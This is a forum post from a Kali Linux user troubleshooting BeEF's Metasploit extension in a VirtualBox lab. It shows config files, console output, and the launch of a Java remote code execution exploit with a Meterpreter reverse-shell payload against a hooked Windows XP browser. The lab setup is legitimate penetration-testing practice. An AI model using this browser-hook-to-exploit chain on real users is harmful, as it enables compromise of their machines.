PDA

View Full Version : BeEF and Metasploit on up-to-date Kali fresh install



riramar
2014-09-03, 13:06
Hi All,

I did a fresh install and update (apt-get update && apt-get upgrade) of Kali in a Virtualbox VM and try to configure and use BeEF integrated with Metasploit.


root@kali:~# uname -a
Linux kali 3.14-kali1-amd64 #1 SMP Debian 3.14.5-1kali1 (2014-06-07) x86_64 GNU/Linux

Everything looks great but when I execute a Metasploit exploit from BeEF I cannot see any job created on Metasploit.
I've already seen some videos on the internet and I saw this working in an Ubuntu box.
I'll describe the steps that I'm doing below just to check if I'm doing right.
First I configured BeEF following the BeEF Wiki page (https://github.com/beefproject/beef/wiki/Configuration) enabling Metasploit extension on BeEF configuration file:


root@kali:~# grep metasploit /etc/beef-xss/config.yaml -A 1
metasploit:
enable: true
root@kali:~#

After that I configured the Metasploit extension updating the parameters host and callback_host with my internal IP and setting the right path for os custom ({os: 'custom', path: '/usr/share/metasploit-framework/'}).


root@kali:~# cat /usr/share/beef-xss/extensions/metasploit/config.yaml
#
# Copyright (c) 2006-2014 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Enable MSF by changing extension:metasploit:enable to true
# Then set msf_callback_host to be the public IP of your MSF server
#
# Ensure you load the xmlrpc interface in Metasploit
# msf > load msgrpc ServerHost=10.211.55.2 Pass=abc123
# Please note that the ServerHost parameter must have the same value of host and callback_host variables here below.
# Also always use the IP of your machine where MSF is listening.
beef:
extension:
metasploit:
name: 'Metasploit'
enable: true
host: "10.0.2.7"
port: 55552
user: "msf"
pass: "abc123"
uri: '/api'
# if you need "ssl: true" make sure you start msfrpcd with "SSL=y", like:
# load msgrpc ServerHost=IP Pass=abc123 SSL=y
ssl: false
ssl_version: 'SSLv3'
ssl_verify: true
callback_host: "10.0.2.7"
autopwn_url: "autopwn"
auto_msfrpcd: false
auto_msfrpcd_timeout: 120
msf_path: [
{os: 'osx', path: '/opt/local/msf/'},
{os: 'livecd', path: '/opt/metasploit-framework/'},
{os: 'bt5r3', path: '/opt/metasploit/msf3/'},
{os: 'bt5', path: '/opt/framework3/msf3/'},
{os: 'backbox', path: '/opt/metasploit3/msf3/'},
{os: 'kali', path: '/usr/share/metasploit-framework/'},
{os: 'pentoo', path: '/usr/lib/metasploit'},
{os: 'win', path: 'c:\\metasploit-framework\\'},
{os: 'custom', path: '/usr/share/metasploit-framework/'}
]
root@kali:~#

In order to start Metasploit first I started Postgresql database (service postgresql start) and after that I started Metasploit (service metasploit start).
With the services running I started msfconsole with some initial configuration (connect to DB, etc.) as you can see below:


root@kali:~# cat .msf4/msfconsole.rc
db_connect -y /opt/metasploit/apps/pro/ui/config/database.yml
set ConsoleLogging true
set LogLevel 5
set SessionLogging true
set TimestampOutput true
spool /root/metasploit/metasploit.spool.txt
set PROMPT '%U@%H(%L) :'
root@kali:~# /usr/bin/msfconsole -r /root/.msf4/msfconsole.rc
...
=[ metasploit v4.10.0-2014082101 [core:4.10.0.pre.2014082101 api:1.0.0]]
+ -- --=[ 1331 exploits - 722 auxiliary - 214 post ]
+ -- --=[ 340 payloads - 35 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
Processing /root/.msf4/msfconsole.rc for ERB directives.
resource (/root/.msf4/msfconsole.rc)> db_connect -y /opt/metasploit/apps/pro/ui/config/database.yml
Rebuilding the module cache in the background...
resource (/root/.msf4/msfconsole.rc)> set ConsoleLogging true
Console logging is now enabled.
ConsoleLogging => true
resource (/root/.msf4/msfconsole.rc)> set LogLevel 5
LogLevel => 5
resource (/root/.msf4/msfconsole.rc)> set SessionLogging true
Session logging will be enabled for future sessions.
SessionLogging => true
resource (/root/.msf4/msfconsole.rc)> set TimestampOutput true
TimestampOutput => true
resource (/root/.msf4/msfconsole.rc)> spool /root/metasploit/metasploit.spool.txt
Spooling to file /root/metasploit/metasploit.spool.txt...
resource (/root/.msf4/msfconsole.rc)> set PROMPT '%U@%H(%L) :'
PROMPT => %U@%H(%L) :
root@kali(10.0.2.7) :>

For enabling RPC communication I started the msgrpc plugin. Of course, IP address, username and password are consistent with the configuration file:


root@kali(10.0.2.7) :> load msgrpc ServerHost=10.0.2.7 Pass=abc123
MSGRPC Service: 10.0.2.7:55552
MSGRPC Username: msf
MSGRPC Password: abc123
Successfully loaded plugin: msgrpc
root@kali(10.0.2.7) :>

Now it's time to run BeEF in another terminal.


root@kali:/usr/share/beef-xss# ./beef -x
[ 9:41:15] Bind socket [imapeudora1] listening on [0.0.0.0:2000].
[ 9:41:15] Browser Exploitation Framework (BeEF) 0.4.4.9-alpha
[ 9:41:15] | Twit: @beefproject
[ 9:41:15] | Site: http://beefproject.com
[ 9:41:15] | Blog: http://blog.beefproject.com
[ 9:41:15] |_ Wiki: https://github.com/beefproject/beef/wiki
[ 9:41:15] Project Creator: Wade Alcorn (@WadeAlcorn)
[ 9:41:15] Successful connection with Metasploit.
[ 9:41:18] Loaded 269 Metasploit exploits.
[ 9:41:18] Resetting the database for BeEF.
[ 9:41:18] BeEF is loading. Wait a few seconds...
[ 9:41:23] 11 extensions enabled.
[ 9:41:23] 464 modules enabled.
[ 9:41:23] 2 network interfaces were detected.
[ 9:41:23][+] running on network interface: 127.0.0.1
[ 9:41:23] | Hook URL: http://127.0.0.1:3000/hook.js
[ 9:41:23] |_ UI URL: http://127.0.0.1:3000/ui/panel
[ 9:41:23][+] running on network interface: 10.0.2.7
[ 9:41:23] | Hook URL: http://10.0.2.7:3000/hook.js
[ 9:41:23] |_ UI URL: http://10.0.2.7:3000/ui/panel
[ 9:41:23] RESTful API key: 571500b69782ad0a5f82f454aad7ee30022717ed
[ 9:41:23] HTTP Proxy: http://127.0.0.1:6789
[ 9:41:23] BeEF server started (press control+c to stop)

As you can see in "Successful connection with Metasploit" the connection with Metasploit is OK!
So I opened BeEF panel on the Kali iceweasel browser login with beef/beef with no problem.
From another Virtualbox VM running Windows XP I accessed the demo page in order to hook it.
From BeEF panel on Kali I could see the the new hooked browser.
Since I already know that the Java CMM Remote Code Execution is working on this Windows XP I ran this modulo on this host with the parameters below:


Java CMM Remote Code Execution
SSL: disabled
SRVHOST: 10.0.2.7
SRVPORT: 8080
URIPATH: 10660e6c
Payload: windows/meterpreter/reverse_tcp

From the terminal that I started BeEF I can see this:


[ 9:44:54] New Hooked Browser [id:1, ip:10.0.2.10, type:IE-7, os:Windows XP], hooked domain [10.0.2.7:3000]
[10:03:10] Hooked browser [id:1, ip:10.0.2.10] has been sent instructions from command module [id:1, name:'Java CMM Remote Code Execution']

But in the other terminal I cannot see any jobs on the msfconsole:


root@kali(10.0.2.7) :> jobs

Jobs
====

No active jobs.

root@kali(10.0.2.7) :>

If I use and run exploit direct from msfconsole it work perfectly.

Anyone has BeEF and Metasploit working in a Kali fresh install?

Thanks
Ricardo